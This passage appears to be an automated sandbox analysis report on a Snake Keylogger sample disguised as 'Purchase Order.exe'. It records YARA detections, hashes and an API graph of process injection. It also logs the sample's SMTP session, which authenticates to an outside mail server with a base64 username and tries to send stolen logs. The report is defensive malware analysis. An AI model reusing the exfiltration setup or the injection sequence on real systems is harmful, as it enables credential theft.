                                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                          Apr 4, 2024 16:34:59.330108881 CEST58749756208.91.199.224192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                          Apr 4, 2024 16:34:59.330379963 CEST49756587192.168.2.4208.91.199.224EHLO 927537
                                                                                                          Apr 4, 2024 16:34:59.525512934 CEST58749756208.91.199.224192.168.2.4250-us2.outbound.mailhostbox.com
                                                                                                          250-PIPELINING
                                                                                                          250-SIZE 41648128
                                                                                                          250-VRFY
                                                                                                          250-ETRN
                                                                                                          250-STARTTLS
                                                                                                          250-AUTH PLAIN LOGIN
                                                                                                          250-AUTH=PLAIN LOGIN
                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                          250-8BITMIME
                                                                                                          250-DSN
                                                                                                          250 CHUNKING
                                                                                                          Apr 4, 2024 16:34:59.528502941 CEST49756587192.168.2.4208.91.199.224AUTH login dHNsb2dzQG1rc2lpbXN0LmNvbQ==
                                                                                                          Apr 4, 2024 16:34:59.725707054 CEST58749756208.91.199.224192.168.2.4334 UGFzc3dvcmQ6
                                                                                                          Apr 4, 2024 16:34:59.928127050 CEST58749756208.91.199.224192.168.2.4235 2.7.0 Authentication successful
                                                                                                          Apr 4, 2024 16:34:59.928333998 CEST49756587192.168.2.4208.91.199.224MAIL FROM:<tslogs@mksiimst.com>
                                                                                                          Apr 4, 2024 16:35:00.125015020 CEST58749756208.91.199.224192.168.2.4250 2.1.0 Ok
                                                                                                          Apr 4, 2024 16:35:00.125196934 CEST49756587192.168.2.4208.91.199.224RCPT TO:<tslogs@mksiimst.com>
                                                                                                          Apr 4, 2024 16:35:00.338974953 CEST58749756208.91.199.224192.168.2.4550 5.4.6 <tslogs@mksiimst.com>: Recipient address rejected: Email Sending Quota Exceeded

                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Target ID:0
                                                                                                          Start time:16:34:01
                                                                                                          Start date:04/04/2024
                                                                                                          Path:C:\Users\user\Desktop\Purchase Order.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\Purchase Order.exe"
                                                                                                          Imagebase:0xf30000
                                                                                                          File size:529'920 bytes
                                                                                                          MD5 hash:B9F9C9CAC777DCA7A78819914DA1BA15
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1733547969.000000000447E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1733547969.000000000447E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1733547969.000000000447E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1733547969.000000000447E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:2
                                                                                                          Start time:16:34:08
                                                                                                          Start date:04/04/2024
                                                                                                          Path:C:\Users\user\Desktop\Purchase Order.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\Purchase Order.exe"
                                                                                                          Imagebase:0xe40000
                                                                                                          File size:529'920 bytes
                                                                                                          MD5 hash:B9F9C9CAC777DCA7A78819914DA1BA15
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4124971142.00000000034A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4123792564.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4123792564.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4123792564.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.4123792564.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4124971142.0000000003201000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Disassembly

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:7.4%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:208
                                                                                                            Total number of Limit Nodes:8
                                                                                                            execution_graph 43539 190d040 43540 190d045 43539->43540 43544 190d618 43540->43544 43547 190d628 43540->43547 43541 190d173 43550 190d27c 43544->43550 43548 190d656 43547->43548 43549 190d27c DuplicateHandle 43547->43549 43548->43541 43549->43548 43551 190d690 DuplicateHandle 43550->43551 43553 190d656 43551->43553 43553->43541 43749 190acb0 43753 190ad97 43749->43753 43761 190ada8 43749->43761 43750 190acbf 43754 190adb9 43753->43754 43755 190addc 43753->43755 43754->43755 43769 190b031 43754->43769 43773 190b040 43754->43773 43755->43750 43756 190add4 43756->43755 43757 190afe0 GetModuleHandleW 43756->43757 43758 190b00d 43757->43758 43758->43750 43762 190adb9 43761->43762 43764 190addc 43761->43764 43762->43764 43767 190b040 LoadLibraryExW 43762->43767 43768 190b031 LoadLibraryExW 43762->43768 43763 190add4 43763->43764 43765 190afe0 GetModuleHandleW 43763->43765 43764->43750 43766 190b00d 43765->43766 43766->43750 43767->43763 43768->43763 43770 190b040 43769->43770 43771 190b079 43770->43771 43777 190a130 43770->43777 43771->43756 43774 190b045 43773->43774 43775 190b079 43774->43775 43776 190a130 LoadLibraryExW 43774->43776 43775->43756 43776->43775 43778 190b220 LoadLibraryExW 43777->43778 43780 190b299 43778->43780 43780->43771 43781 5303048 43782 53031d3 43781->43782 43783 530306e 43781->43783 43783->43782 43786 53036d0 PostMessageW 43783->43786 43788 53036c8 43783->43788 43787 530373c 43786->43787 43787->43783 43789 53036d0 PostMessageW 43788->43789 43790 530373c 43789->43790 43790->43783 43791 1904668 43792 190467a 43791->43792 43793 1904686 43792->43793 43795 1904779 43792->43795 43796 190479d 43795->43796 43800 1904888 43796->43800 43804 1904879 43796->43804 43802 190488d 43800->43802 43801 190498c 43802->43801 43808 19044c4 43802->43808 43806 1904888 43804->43806 43805 190498c 43805->43805 43806->43805 43807 19044c4 CreateActCtxA 43806->43807 43807->43805 43809 1905918 CreateActCtxA 43808->43809 43811 19059db 43809->43811 43554 53013ea 43555 5301439 43554->43555 43559 5301da0 43555->43559 43565 5301d91 43555->43565 43556 5301449 43560 5301db5 43559->43560 43562 5301d91 12 API calls 43560->43562 43575 5301e3e 43560->43575 43581 5301dd1 43560->43581 43561 5301dc7 43561->43556 43562->43561 43566 5301d9a 43565->43566 43567 5301de9 43565->43567 43570 5301d91 12 API calls 43566->43570 43571 5301dd1 12 API calls 43566->43571 43572 5301e3e 12 API calls 43566->43572 43573 53020f8 12 API calls 43567->43573 43574 53020e8 12 API calls 43567->43574 43568 5301dc7 43568->43556 43569 5301e1e 43569->43556 43570->43568 43571->43568 43572->43568 43573->43569 43574->43569 43576 5301dcc 43575->43576 43578 5301e41 43575->43578 43586 53020f8 43576->43586 43602 53020e8 43576->43602 43577 5301e1e 43577->43561 43578->43561 43582 5301dfa 43581->43582 43584 53020f8 12 API calls 43582->43584 43585 53020e8 12 API calls 43582->43585 43583 5301e1e 43583->43561 43584->43583 43585->43583 43587 530210d 43586->43587 43618 53026d0 43587->43618 43626 530234f 43587->43626 43633 530220e 43587->43633 43638 5302685 43587->43638 43642 53026e4 43587->43642 43647 53023e1 43587->43647 43651 530291c 43587->43651 43658 5302279 43587->43658 43663 53025d7 43587->43663 43668 53028f7 43587->43668 43673 5302816 43587->43673 43678 5302496 43587->43678 43683 53026f4 43587->43683 43588 530211f 43588->43577 43603 53020f8 43602->43603 43605 53026d0 4 API calls 43603->43605 43606 53026f4 4 API calls 43603->43606 43607 5302496 2 API calls 43603->43607 43608 5302816 2 API calls 43603->43608 43609 53028f7 2 API calls 43603->43609 43610 53025d7 2 API calls 43603->43610 43611 5302279 2 API calls 43603->43611 43612 530291c 4 API calls 43603->43612 43613 53023e1 2 API calls 43603->43613 43614 53026e4 2 API calls 43603->43614 43615 5302685 2 API calls 43603->43615 43616 530220e 2 API calls 43603->43616 43617 530234f 4 API calls 43603->43617 43604 530211f 43604->43577 43605->43604 43606->43604 43607->43604 43608->43604 43609->43604 43610->43604 43611->43604 43612->43604 43613->43604 43614->43604 43615->43604 43616->43604 43617->43604 43619 53026dd 43618->43619 43620 530244e 43618->43620 43619->43588 43621 5302c4f 43620->43621 43691 5300d10 43620->43691 43695 5300d09 43620->43695 43699 5300c50 43620->43699 43703 5300c48 43620->43703 43621->43588 43627 530235c 43626->43627 43628 5302c4f 43627->43628 43629 5300d10 WriteProcessMemory 43627->43629 43630 5300d09 WriteProcessMemory 43627->43630 43631 5300c50 VirtualAllocEx 43627->43631 43632 5300c48 VirtualAllocEx 43627->43632 43628->43588 43629->43627 43630->43627 43631->43627 43632->43627 43634 5302219 43633->43634 43707 5300f98 43634->43707 43711 5300f8d 43634->43711 43715 5300e00 43638->43715 43719 5300df9 43638->43719 43639 53026b1 43643 530272d 43642->43643 43723 5302ea8 43643->43723 43728 5302e98 43643->43728 43644 5302746 43649 5300d10 WriteProcessMemory 43647->43649 43650 5300d09 WriteProcessMemory 43647->43650 43648 5302418 43649->43648 43650->43648 43652 5302922 43651->43652 43653 5302c4f 43652->43653 43654 5300c50 VirtualAllocEx 43652->43654 43655 5300c48 VirtualAllocEx 43652->43655 43656 5300d10 WriteProcessMemory 43652->43656 43657 5300d09 WriteProcessMemory 43652->43657 43653->43588 43654->43652 43655->43652 43656->43652 43657->43652 43659 530227d 43658->43659 43661 5300f98 CreateProcessA 43659->43661 43662 5300f8d CreateProcessA 43659->43662 43660 53022b0 43661->43660 43662->43660 43664 53025db 43663->43664 43741 5300690 43664->43741 43745 5300689 43664->43745 43665 53027fe 43665->43588 43669 53028fd 43668->43669 43671 5300d10 WriteProcessMemory 43669->43671 43672 5300d09 WriteProcessMemory 43669->43672 43670 5302a90 43671->43670 43672->43670 43674 5302831 43673->43674 43676 5300690 ResumeThread 43674->43676 43677 5300689 ResumeThread 43674->43677 43675 53027fe 43675->43588 43676->43675 43677->43675 43679 53024b4 43678->43679 43680 53027fe 43679->43680 43681 5300690 ResumeThread 43679->43681 43682 5300689 ResumeThread 43679->43682 43680->43588 43681->43680 43682->43680 43684 53025db 43683->43684 43685 53028b7 43683->43685 43686 53027fe 43684->43686 43687 5300690 ResumeThread 43684->43687 43688 5300689 ResumeThread 43684->43688 43689 5300b70 Wow64SetThreadContext 43685->43689 43690 5300b78 Wow64SetThreadContext 43685->43690 43686->43588 43687->43686 43688->43686 43689->43684 43690->43684 43692 5300d58 WriteProcessMemory 43691->43692 43694 5300daf 43692->43694 43694->43620 43696 5300d10 WriteProcessMemory 43695->43696 43698 5300daf 43696->43698 43698->43620 43700 5300c90 VirtualAllocEx 43699->43700 43702 5300ccd 43700->43702 43702->43620 43704 5300c90 VirtualAllocEx 43703->43704 43706 5300ccd 43704->43706 43706->43620 43708 5301021 CreateProcessA 43707->43708 43710 53011e3 43708->43710 43710->43710 43712 5301021 CreateProcessA 43711->43712 43714 53011e3 43712->43714 43714->43714 43716 5300e4b ReadProcessMemory 43715->43716 43718 5300e8f 43716->43718 43718->43639 43720 5300e00 ReadProcessMemory 43719->43720 43722 5300e8f 43720->43722 43722->43639 43724 5302ebd 43723->43724 43733 5300b70 43724->43733 43737 5300b78 43724->43737 43725 5302ed3 43725->43644 43729 5302ea8 43728->43729 43731 5300b70 Wow64SetThreadContext 43729->43731 43732 5300b78 Wow64SetThreadContext 43729->43732 43730 5302ed3 43730->43644 43731->43730 43732->43730 43734 5300b78 Wow64SetThreadContext 43733->43734 43736 5300c05 43734->43736 43736->43725 43738 5300bbd Wow64SetThreadContext 43737->43738 43740 5300c05 43738->43740 43740->43725 43742 53006d0 ResumeThread 43741->43742 43744 5300701 43742->43744 43744->43665 43746 5300690 ResumeThread 43745->43746 43748 5300701 43746->43748 43748->43665

                                                                                                            Executed Functions

                                                                                                            Function 094B7828 Relevance: .2, Instructions: 160COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7a1952e44047fe7491682b987240065d8a2ce7921e3c13b6828b6a9a047035ac
                                                                                                            • Instruction ID: 0845e7c7c3a9187014bce678a9e36a9fb8f0e6d03b716e84d237caa0b2c99b86
                                                                                                            • Opcode Fuzzy Hash: 7a1952e44047fe7491682b987240065d8a2ce7921e3c13b6828b6a9a047035ac
                                                                                                            • Instruction Fuzzy Hash: 7361C474E051199BDB04CFA9C5809EEFBF2FF88300F14D56AD818AB355D731A942CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B7818 Relevance: .1, Instructions: 109COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c603cfcd99ed681298ea36d941e0e6d929d9a1fed326e8c02586a994c2ea5124
                                                                                                            • Instruction ID: 734350216d42c990f463c25b85e2f8c6184b17b7e920408886dd87240343ecac
                                                                                                            • Opcode Fuzzy Hash: c603cfcd99ed681298ea36d941e0e6d929d9a1fed326e8c02586a994c2ea5124
                                                                                                            • Instruction Fuzzy Hash: 4C41C6B5E015099FDB04DFAAD9805AEFBF2EF88300F14C46AD918AB354DB309946CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BB158 Relevance: .1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f1a4487765f280f965513b76f2f24978a2490d4f7565eaa647fe919708d2361a
                                                                                                            • Instruction ID: 75b9e75634b90c210cba6698507ccc1d23c9b81bdd1e41021f0f3e8ccc817d93
                                                                                                            • Opcode Fuzzy Hash: f1a4487765f280f965513b76f2f24978a2490d4f7565eaa647fe919708d2361a
                                                                                                            • Instruction Fuzzy Hash: F021D8B1D056588BEB18CFABC9457DEFEF6AF89340F04C06AD40966264DB750946CF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BB168 Relevance: .1, Instructions: 60COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 09c78c72a0fdde6cff3d69ea72dd9cc9d2db5c37c9ffb0abb81824a762a640fc
                                                                                                            • Instruction ID: b0d10850cd10c451647667e545bb928616509e40db4f46c9fcd420a3c5fea5c5
                                                                                                            • Opcode Fuzzy Hash: 09c78c72a0fdde6cff3d69ea72dd9cc9d2db5c37c9ffb0abb81824a762a640fc
                                                                                                            • Instruction Fuzzy Hash: 5C21C3B0D046188BEB18CFABC9457DEFEF6AFC8340F04C46AD409A6264DB750946CE90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BA280 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 381 94ba280-94ba2a3 382 94ba2aa-94ba2ea 381->382 383 94ba2a5 381->383 384 94ba34c-94ba36b 382->384 385 94ba2f2-94ba2f7 382->385 383->382 403 94ba3f4-94ba40d 384->403 386 94ba2fd-94ba2fe 385->386 387 94ba492-94ba493 385->387 386->387 388 94ba399-94ba39d 387->388 390 94ba379-94ba397 388->390 391 94ba39f-94ba3a0 388->391 390->388 393 94ba40f-94ba47f 391->393 418 94ba481 call 94bb4aa 393->418 419 94ba481 call 94bb158 393->419 420 94ba481 call 94bb168 393->420 421 94ba481 call 94bb275 393->421 403->393 407 94ba3b3-94ba3ca call 94baa40 403->407 411 94ba3b0-94ba3e8 call 94ba228 407->411 408 94ba487-94ba491 411->385 416 94ba3ee 411->416 416->403 418->408 419->408 420->408 421->408
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Tefq$Tefq
                                                                                                            • API String ID: 0-1395890369
                                                                                                            • Opcode ID: 5c15681cb8c1c6be300ec3b14a895ceedad3d418e15dcd375051167af7effabe
                                                                                                            • Instruction ID: b717cf54116aa40effbe95b9083ca698d8578783553c1d592d268318d15942ba
                                                                                                            • Opcode Fuzzy Hash: 5c15681cb8c1c6be300ec3b14a895ceedad3d418e15dcd375051167af7effabe
                                                                                                            • Instruction Fuzzy Hash: 5761B374E042188FDB08DFA9D984AEEBBF6BF89300F14902AD419AB355DB715946CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0586BD08 Relevance: 2.7, Strings: 2, Instructions: 158COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 422 586bd08-586c273 425 586c275-586c279 422->425 426 586c27a-586c2d9 422->426 432 586c2e6 426->432 433 586c2db-586c2e4 426->433 434 586c2e8-586c2ed 432->434 433->434 435 586c332-586c367 434->435 436 586c2ef-586c2f1 434->436 438 586c36e-586c3fa 435->438 437 586c2f3-586c2f6 436->437 436->438 437->438 439 586c2f8-586c2fb 437->439 459 586c44c-586c44e 438->459 460 586c3fc-586c402 438->460 439->438 441 586c2fd-586c300 439->441 441->438 443 586c302-586c306 441->443 445 586c30d-586c322 443->445 446 586c308-586c30b 443->446 448 586c32d-586c331 445->448 449 586c324-586c328 call 586bd24 445->449 446->445 446->448 449->448 461 586c417-586c41d 460->461 462 586c404-586c40c 460->462 463 586c433-586c439 461->463 464 586c41f-586c432 461->464 468 586c412 call 586c450 462->468 469 586c412 call 586c460 462->469 463->459 466 586c43b-586c443 463->466 465 586c414-586c416 466->459 468->465 469->465
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (jq$Hjq
                                                                                                            • API String ID: 0-2151573235
                                                                                                            • Opcode ID: 10a27a7028116ea73de3d761934e107e3b31a5418293937106d65fdc1a6c26d0
                                                                                                            • Instruction ID: 6581aafd4cc053ca6f47c773e1c7ed8aaac861ac130f2bae7e2656c44416948d
                                                                                                            • Opcode Fuzzy Hash: 10a27a7028116ea73de3d761934e107e3b31a5418293937106d65fdc1a6c26d0
                                                                                                            • Instruction Fuzzy Hash: 9A51E372B042548FC718EF68D454ABD7BA2FF84300F19846AD98ADB791CA35AC46CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BD5AA Relevance: 2.5, Strings: 2, Instructions: 48COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 470 94bd5aa-94bd5ce 473 94bd5d0 470->473 474 94bd5d7-94bd909 470->474 473->474 477 94bd914-94bd91f 474->477 485 94bd922 call 53002a0 477->485 486 94bd922 call 530028f 477->486 478 94bd928-94bd93a 480 94bdb12-94bdb17 478->480 481 94bdb22-94bdb5a 480->481 485->478 486->478
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: HvT$PuT
                                                                                                            • API String ID: 0-328515043
                                                                                                            • Opcode ID: 74347c550cebb10d48b830962cd4aae111879064967259cb3f1b6fbeb113974a
                                                                                                            • Instruction ID: 70cc93c15f1669d5251907ba96a59e9f24935752be3b02dee251dc72f8941dd1
                                                                                                            • Opcode Fuzzy Hash: 74347c550cebb10d48b830962cd4aae111879064967259cb3f1b6fbeb113974a
                                                                                                            • Instruction Fuzzy Hash: 76114CB4E04288CFCB94CF79D49859C7BF6FB88308B20955AD516EB345DB305805DF55
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B296B Relevance: 2.5, Strings: 2, Instructions: 45COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 487 94b296b-94b2c02 494 94b2c09-94b2c16 487->494 495 94b2c18-94b2c24 494->495 496 94b2c40 494->496 497 94b2c2e-94b2c34 495->497 498 94b2c26-94b2c2c 495->498 499 94b2c46-94b2c49 496->499 500 94b2c3e 497->500 498->500 500->499
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $fq$$fq
                                                                                                            • API String ID: 0-2537786760
                                                                                                            • Opcode ID: df987ac74fcef65c01f1ebf816a5172a830d06dab8a4a0b72f759712cb2ddcac
                                                                                                            • Instruction ID: a9c5fd9f10de67c319e2ec80b92adbc0576296da961e927655de62cd541ddc34
                                                                                                            • Opcode Fuzzy Hash: df987ac74fcef65c01f1ebf816a5172a830d06dab8a4a0b72f759712cb2ddcac
                                                                                                            • Instruction Fuzzy Hash: B111C074A04328CFDB28CF68C9907AABBB2BF59300F10509AD5496B359CB715E82CF52
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0586A688 Relevance: 2.0, Strings: 1, Instructions: 775COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: #o-m^
                                                                                                            • API String ID: 0-3330988397
                                                                                                            • Opcode ID: b976035a4b31f8d03d427ae120638715f68ff0a6139f56ab856e8bf1fcd28893
                                                                                                            • Instruction ID: 096504dc54ce3fcb79db40f749983394b3d9bee35aaee4aef6ec235b75465121
                                                                                                            • Opcode Fuzzy Hash: b976035a4b31f8d03d427ae120638715f68ff0a6139f56ab856e8bf1fcd28893
                                                                                                            • Instruction Fuzzy Hash: 8962E570F05B899ADF74AF74D85839E7AA1BB46305F10492FD8FACA290DF349841CB46
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05300F8D Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 800 5300f8d-530102d 802 5301066-5301086 800->802 803 530102f-5301039 800->803 810 5301088-5301092 802->810 811 53010bf-53010ee 802->811 803->802 804 530103b-530103d 803->804 805 5301060-5301063 804->805 806 530103f-5301049 804->806 805->802 808 530104b 806->808 809 530104d-530105c 806->809 808->809 809->809 812 530105e 809->812 810->811 813 5301094-5301096 810->813 817 53010f0-53010fa 811->817 818 5301127-53011e1 CreateProcessA 811->818 812->805 815 5301098-53010a2 813->815 816 53010b9-53010bc 813->816 819 53010a4 815->819 820 53010a6-53010b5 815->820 816->811 817->818 821 53010fc-53010fe 817->821 831 53011e3-53011e9 818->831 832 53011ea-5301270 818->832 819->820 820->820 822 53010b7 820->822 823 5301100-530110a 821->823 824 5301121-5301124 821->824 822->816 826 530110c 823->826 827 530110e-530111d 823->827 824->818 826->827 827->827 828 530111f 827->828 828->824 831->832 842 5301280-5301284 832->842 843 5301272-5301276 832->843 845 5301294-5301298 842->845 846 5301286-530128a 842->846 843->842 844 5301278 843->844 844->842 848 53012a8-53012ac 845->848 849 530129a-530129e 845->849 846->845 847 530128c 846->847 847->845 851 53012be-53012c5 848->851 852 53012ae-53012b4 848->852 849->848 850 53012a0 849->850 850->848 853 53012c7-53012d6 851->853 854 53012dc 851->854 852->851 853->854 856 53012dd 854->856 856->856
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 053011CE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734783590.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5300000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: 5e98fda96c5ba6b3b6c2b907e1ecbd0928a82d8caaf3791428db6e9ce4fc6e2e
                                                                                                            • Instruction ID: 4a287e50b03a96a22ff4b0f71963ca290c76affad25135e05fe44f5826469e1c
                                                                                                            • Opcode Fuzzy Hash: 5e98fda96c5ba6b3b6c2b907e1ecbd0928a82d8caaf3791428db6e9ce4fc6e2e
                                                                                                            • Instruction Fuzzy Hash: 39916C71D003199FDB24DFA9CC91BEEBBB2BF48314F148169E849A7280DB749985CF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05300F98 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
